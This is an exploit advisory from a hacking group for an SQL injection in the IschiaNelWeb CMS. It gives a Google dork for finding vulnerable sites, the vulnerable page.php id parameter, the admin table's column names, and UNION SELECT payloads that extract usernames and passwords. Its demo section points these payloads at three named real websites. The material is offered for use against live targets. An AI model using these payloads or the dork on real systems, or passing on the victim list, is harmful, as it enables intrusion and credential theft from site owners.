############################################################################ # Exploit Title: ischianelweb SQL Injection Vulnerability # Google Dork: inurl:page.php "powered by IschiaNelWeb" # Date: 4/1/2012 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Software Link: www.ischianelweb.net # Version: All Version # Security Risk::High # Tested on: GNU/Linux Ubuntu - Windows Server ############################################################################ # Exploit: # # http://[target]/page.php?id=[SQLi] # # table for admin : users # # columns for users table :id,user,pass # # Demo: # # www.hotellunadimiele.it/page.php?id=-6+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10+from+users-- # www.hotelbellavistaischia.com/page.php?id=-6+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11+from+users-- # www.bijouxstyle.eu/page.php?id=-1+union+select+group_concat(id,0x3a,user,0x3a,pass)+from+users-- # # ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # IrIsT-K0242-P0W3RFU7-Mr.M4st3r , ... ############################################################################ GreetZ : All H4ckCity Member - BHG members ############################################################################